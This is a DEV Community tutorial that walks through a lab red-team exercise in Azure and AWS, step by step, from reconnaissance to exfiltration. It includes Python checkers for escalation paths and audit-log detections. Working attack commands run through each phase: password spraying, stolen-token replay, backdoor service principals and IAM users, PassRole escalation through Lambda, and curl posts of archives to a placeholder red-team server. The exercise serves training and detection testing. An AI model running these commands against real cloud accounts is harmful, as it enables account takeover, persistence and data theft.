From Recon to Exfiltration: A Step-by-Step Red Team Exercise in Azure and AWS



This content originally appeared on DEV Community and was authored by Eng Soon Cheah


This will cover:

  1. Preparation & Scope
  2. Step-by-Step Attack Simulation (per cloud)
  3. Tools & Command Examples
  4. Detection & Response Checks

1. Preparation & Scope

Environment

  • Azure: Create a separate tenant/subscription for testing; deploy dummy resources (VMs, Storage Accounts, Function Apps and, if the test tenant carries a Microsoft 365 licence, a SharePoint site) seeded with dummy data.
  • AWS: Use a sandbox account (or an AWS Organizations member account with no trust relationships to production accounts) and deploy S3 buckets, EC2 instances, Lambda functions, IAM roles, and IAM users with varying privilege levels.

Rules of Engagement

  • No real destructive changes to production
  • No real credentials outside the lab
  • Simulated payloads only (no actual malware)
  • All actions logged for review (CloudTrail, the Azure Activity log and Entra ID audit/sign-in logging are enabled before the exercise starts, so the detection checks in section 4 have data to work with)

2. Step-by-Step Red Team Exercise

Azure Exercise

Phase 1 – Reconnaissance

Objective: Map the Microsoft Entra ID (Azure AD) tenant and the Azure resource landscape

  • T1087.004 – Cloud Account Discovery
# List all Entra ID (Azure AD) users
az ad user list --query '[].{displayName:displayName,userPrincipalName:userPrincipalName}'
  • T1526 – Cloud Service Discovery
# List all subscriptions the current identity can see
az account list --output table
  • Enumerate storage accounts that permit anonymous blob access (lab accounts only). The flag below only means public containers are allowed on the account; data is exposed only where a container's own access level is also set to blob or container.
az storage account list --query '[?allowBlobPublicAccess==`true`].{name:name,resourceGroup:resourceGroup}'

Phase 2 – Initial Access

  • T1110.003 – Password Spraying (Safe Simulation): one password across many lab users, so no single account reaches the smart-lockout threshold. az login with -u/-p cannot complete MFA, so this step only succeeds against lab users without it.
# Spray one password across the lab users; quote $user and drop the cached login on success
while IFS= read -r user; do
  az login -u "$user" -p 'Winter2025!' --allow-no-subscriptions -o none 2>/dev/null \
    && echo "[+] valid: $user" && az logout
done < users.txt
  • T1078 – Valid Accounts (Simulated Stolen Token). az rest normally attaches a token from its own login, so tell it to skip that header and send the stolen token instead.
export AZURE_ACCESS_TOKEN="eyJhbGciOi..."
az rest --method get --url https://graph.microsoft.com/v1.0/me --skip-authorization-header --headers "Authorization=Bearer $AZURE_ACCESS_TOKEN"

Phase 3 – Privilege Escalation

  • T1098.001 – Additional Cloud Credentials. create-for-rbac registers an app, creates its service principal, issues a client secret and assigns the role in one step; current versions of the CLI require --scopes whenever --role is given. (Resetting the credential on an existing, already-privileged service principal is the closer match for this sub-technique; creating a fresh one is the persistence step in Phase 4.)
az ad sp create-for-rbac --name "backdoor-sp" --role Contributor --scopes /subscriptions/<SUB_ID>
  • T1098.003 – Additional Cloud Roles. This only succeeds if the identity you hold has Owner or User Access Administrator at that scope, which is exactly the precondition the exercise checks for.
az role assignment create --assignee <SP_ID> --role Owner --scope /subscriptions/<SUB_ID>

Phase 4 – Persistence

  • T1136.003 – Cloud Account Creation: keep the backdoor SP from Phase 3 as a long-lived foothold (its client secret is valid for one year by default, so record the expiry for cleanup)
  • T1528 – Steal Application Access Token: register an OAuth app requesting overprivileged Graph permissions and consent to it yourself (simulated consent phishing)

Phase 5 – Lateral Movement

  • T1530 – Data from Cloud Storage
az storage blob list --container-name mycontainer --account-name mystorageaccount --auth-mode login
  • Cross-subscription enumeration (--all covers every scope inside the selected subscription only; switch with az account set and repeat for each subscription found in Phase 1)
az role assignment list --all

Phase 6 – Exfiltration

  • T1041 – Exfiltration Over C2 Channel (HTTPS to the red team server; simulated with a dummy archive)
curl -X POST -F "file=@dummydata.zip" https://<redteam-server>/upload

Phase 7 – Cleanup

  • Remove role assignments, SPs, app registrations and OAuth apps created in the lab. Delete the role assignment first: removing the principal alone leaves an orphaned "identity not found" assignment behind. az ad sp delete no longer removes the underlying app registration, so delete that separately by its app ID.
az role assignment delete --assignee <SP_ID> --scope /subscriptions/<SUB_ID>
az ad sp delete --id <SP_ID>

AWS Exercise

Phase 1 – Reconnaissance

  • T1087.004 – Cloud Account Discovery
aws iam list-users
  • T1580 – Cloud Infrastructure Discovery
aws ec2 describe-instances
aws s3 ls

Phase 2 – Initial Access

  • T1078 – Valid Accounts (Simulated Compromised Keys). Confirm which principal the keys belong to before doing anything noisier.
export AWS_ACCESS_KEY_ID="AKIA..."
export AWS_SECRET_ACCESS_KEY="secret..."
aws sts get-caller-identity
  • T1526 – Cloud Service Discovery
aws lambda list-functions

Phase 3 – Privilege Escalation

  • T1098.003 – Additional Cloud Roles (attach a managed policy to the user you control; requires iam:AttachUserPolicy)
aws iam attach-user-policy --user-name testuser --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
  • T1078.004 – Cloud Accounts, via iam:PassRole abuse. There is no aws iam pass-role command: iam:PassRole is a permission consumed when you hand a role to a service, so the escalation is creating a Lambda function that executes as the high-privilege role (function.zip holds whatever handler you want run under that role) and then invoking it
aws lambda create-function --function-name escalate --runtime python3.12 --role arn:aws:iam::<account-id>:role/HighPrivilegeRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name escalate out.json
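Before running Phase 3 it helps to know which of these paths the policy attached to the foothold identity actually permits. The block below is an added example (my code, not the author's) that evaluates a constructed IAM policy document against the three escalation paths used in Phases 3 and 4. It deliberately simplifies IAM evaluation: only Allow/Deny on action names in statements whose Resource is "*" are considered, explicit Deny wins, and conditions, resource ARNs and the target role's trust policy are ignored, so a hit is a lead to confirm in the lab rather than a proof. The policy, path names and threshold are invented for the example.

```python
"""Flag which IAM privilege-escalation paths a policy document allows (added example)."""
import fnmatch

# Constructed lab policy, not taken from any real account: an over-permissive developer policy
# that forbids attaching policies but still allows PassRole to Lambda.
LAB_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:List*", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:AttachUserPolicy", "Resource": "*"},
    ],
}

# Escalation paths from Phases 3 and 4; each needs every listed action to be allowed.
ESCALATION_PATHS = {
    "attach-admin-policy-to-self": ["iam:AttachUserPolicy"],
    "passrole-to-lambda": ["iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"],
    "create-backdoor-user": ["iam:CreateUser", "iam:CreateAccessKey"],
}


def _as_list(value):
    """IAM allows Action/Resource to be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def action_allowed(policy, action):
    """Simplified IAM evaluation: explicit Deny beats Allow, wildcards ('iam:*', '*') match
    case-insensitively, and only statements with Resource "*" are considered."""
    allowed = False
    for stmt in policy["Statement"]:
        if "*" not in _as_list(stmt.get("Resource", "*")):
            continue  # simplification: resource-scoped statements are not evaluated
        for pattern in _as_list(stmt.get("Action", [])):
            if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                if stmt["Effect"] == "Deny":
                    return False  # an explicit Deny anywhere ends the evaluation
                allowed = True
    return allowed


def escalation_paths(policy):
    """Names of the escalation paths for which every required action is allowed."""
    return sorted(name for name, actions in ESCALATION_PATHS.items()
                  if all(action_allowed(policy, a) for a in actions))


if __name__ == "__main__":
    print("open escalation paths:", escalation_paths(LAB_POLICY))
```

Run it against the policy documents returned by aws iam get-user-policy / get-policy-version for the foothold user; on the constructed LAB_POLICY only the PassRole path is open, because the Deny on iam:AttachUserPolicy overrides the wildcard-free Allow statements.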

Phase 4 – Persistence

  • T1136.003 – Cloud Account Creation
aws iam create-user --user-name backdoor
aws iam create-access-key --user-name backdoor

Phase 5 – Lateral Movement

  • Cross-account role assumption (succeeds only where the target role's trust policy names the account you are coming from):
aws sts assume-role --role-arn arn:aws:iam::<account-id>:role/CrossAccountRole --role-session-name attacker
  • S3 sensitive file search:
aws s3 sync s3://target-bucket ./loot --exclude "*" --include "*.csv"

Phase 6 – Exfiltration

  • T1041 – Exfiltration Over C2 Channel (HTTPS to the red team server; simulated)
curl -F "file=@loot.zip" https://<redteam-server>/upload

Phase 7 – Cleanup

  • Remove IAM users, access keys, roles, policies and functions created during the test. Delete the access key first, otherwise delete-user fails; also detach AdministratorAccess from testuser and delete the escalate function.
aws iam delete-access-key --user-name backdoor --access-key-id <KEY_ID>
aws iam delete-user --user-name backdoor

3. Tools to Use

4. Detection & Response Checks

  • Azure: Ensure Microsoft Defender for Cloud and Microsoft Sentinel trigger alerts for:

    • Unusual sign-ins (SigninLogs: many distinct users failing with error 50126 from one IP during the spray; Entra ID Protection risk detections for the replayed token)
    • New Service Principals (AuditLogs activity "Add service principal", together with the matching app registration)
    • Role assignment changes (Activity log operation Microsoft.Authorization/roleAssignments/write, especially Owner at subscription scope)
  • AWS: Ensure GuardDuty and Security Hub trigger alerts for:

    • New IAM user creation (CloudTrail CreateUser followed by CreateAccessKey from the same principal, and AttachUserPolicy with AdministratorAccess)
    • Cross-account role assumption (CloudTrail AssumeRole where the caller's account differs from the account that owns the role, plus CreateFunction with a high-privilege role)
    • S3 bucket data access anomalies (S3 data events must be enabled in CloudTrail for GetObject bursts to be visible; GuardDuty S3 Protection covers the same source)
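To make these checks concrete, here is an added example (my code, not the author's) that runs the detection logic for every phase above over a constructed event stream. The events are invented for the lab and only borrow the field names of the CloudTrail, Azure Activity log and Entra ID sign-in/audit log schemas; account IDs, user names and the IP address are placeholders, and the spray threshold of five distinct users per IP is an assumed tuning value.

```python
"""Detection pass over constructed cloud audit events for the exercise above (added example)."""
from collections import defaultdict

# Assumed threshold: this many distinct users failing from one IP is treated as a spray.
SPRAY_THRESHOLD = 5

# Constructed sample events (placeholders, not real telemetry); field names follow the real schemas.
SAMPLE_EVENTS = [
    {"source": "cloudtrail", "eventName": "CreateUser",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/testuser", "accountId": "111111111111"},
     "requestParameters": {"userName": "backdoor"}},
    {"source": "cloudtrail", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/testuser", "accountId": "111111111111"},
     "requestParameters": {"userName": "backdoor"}},
    {"source": "cloudtrail", "eventName": "AttachUserPolicy",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/testuser", "accountId": "111111111111"},
     "requestParameters": {"userName": "testuser",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"source": "cloudtrail", "eventName": "AssumeRole", "recipientAccountId": "222222222222",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/testuser", "accountId": "111111111111"},
     "requestParameters": {"roleArn": "arn:aws:iam::222222222222:role/CrossAccountRole"}},
    {"source": "cloudtrail", "eventName": "CreateFunction20150331",  # Lambda events carry the API date
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/testuser", "accountId": "111111111111"},
     "requestParameters": {"functionName": "escalate",
                           "role": "arn:aws:iam::111111111111:role/HighPrivilegeRole"}},
    {"source": "azure_activity", "operationName": "Microsoft.Authorization/roleAssignments/write",
     "caller": "attacker@lab.example", "resultType": "Success"},
    {"source": "azure_audit", "activityDisplayName": "Add service principal",
     "initiatedBy": "attacker@lab.example", "targetDisplayName": "backdoor-sp"},
] + [
    # ten lab users failing with the same wrong password from one IP (Entra error 50126)
    {"source": "azure_signin", "userPrincipalName": f"user{i}@lab.example",
     "ipAddress": "203.0.113.10", "resultType": "50126"}
    for i in range(10)
]


def detect(events):
    """Return (rule, detail) findings for the event stream, in the order they fire."""
    findings = []
    failed_users_by_ip = defaultdict(set)
    for e in events:
        src = e["source"]
        if src == "cloudtrail":
            name = e["eventName"]
            who = e["userIdentity"].get("arn", "?")
            req = e.get("requestParameters") or {}
            if name in ("CreateUser", "CreateAccessKey"):
                findings.append(("aws-iam-persistence", f"{name} {req.get('userName')} by {who}"))
            elif name == "AttachUserPolicy" and req.get("policyArn", "").endswith("/AdministratorAccess"):
                findings.append(("aws-admin-policy-attached", f"to {req.get('userName')} by {who}"))
            elif name == "AssumeRole":
                # logged in the account that owns the role; a different caller account is cross-account
                caller_acct = e["userIdentity"].get("accountId")
                target_acct = e.get("recipientAccountId")
                if caller_acct and target_acct and caller_acct != target_acct:
                    findings.append(("aws-cross-account-assume-role", f"{who} -> {req.get('roleArn')}"))
            elif name.startswith("CreateFunction") and req.get("role"):
                findings.append(("aws-passrole-to-lambda", f"{req['functionName']} runs as {req['role']}"))
        elif src == "azure_activity" and e["operationName"] == "Microsoft.Authorization/roleAssignments/write":
            findings.append(("azure-role-assignment-write", f"by {e['caller']}"))
        elif src == "azure_audit" and e["activityDisplayName"] == "Add service principal":
            findings.append(("azure-new-service-principal", f"{e['targetDisplayName']} by {e['initiatedBy']}"))
        elif src == "azure_signin" and e["resultType"] == "50126":
            failed_users_by_ip[e["ipAddress"]].add(e["userPrincipalName"])
    # spray check runs after the pass: one IP, many distinct users, same failure code
    for ip, users in failed_users_by_ip.items():
        if len(users) >= SPRAY_THRESHOLD:
            findings.append(("azure-password-spray", f"{len(users)} users failed from {ip}"))
    return findings


def rule_names(events):
    """Distinct rules that fired, sorted, for a quick coverage comparison against section 4."""
    return sorted({rule for rule, _ in detect(events)})


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

Every step of both exercises should produce at least one finding here; if a rule stays silent when the real logs are fed in, the gap is in log collection (S3 data events or Entra sign-in export not enabled) rather than in the attack being quiet.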

